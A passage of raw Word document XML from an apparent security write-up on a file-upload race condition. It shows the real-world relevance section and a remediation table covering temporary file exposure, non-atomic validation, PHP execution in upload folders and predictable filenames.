          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">7. REAL-WORLD RELEVANCE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This attack pattern appears in real applications wherever:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Files are temporarily stored before async validation — virus scanning, content moderation pipelines</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloud storage pre-signed URLs have delayed permission checks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CDN edge caches serve files before origin validation completes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A56A0" w:sz="8" w:space="2"/>
        </w:pBdr>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56A0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">8. REMEDIATION</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b/>
                <w:bCs/>
                <w:color w:val="1A56A0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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b/>
                <w:bCs/>
                <w:color w:val="1A56A0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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b/>
                <w:bCs/>
                <w:color w:val="1A56A0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Fix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Temporary file exposure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Critical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Validate file before writing to web-accessible path; use non-web-accessible temp directory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 atomic validate-then-save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Critical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Make validation and storage atomic — never save to final path before validation completes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PHP execution in upload directory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Disable script execution in upload directories via server config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Predictable file paths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 random UUIDs for uploaded filenames to prevent targeted GET requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="1A56A0" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Neelesh Pandey  |  github.com/Neelesh707  |  linkedin.com/in/neelesh-pandey021</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2026-03-30T06:14:40.625Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-30T06:14:40.626Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>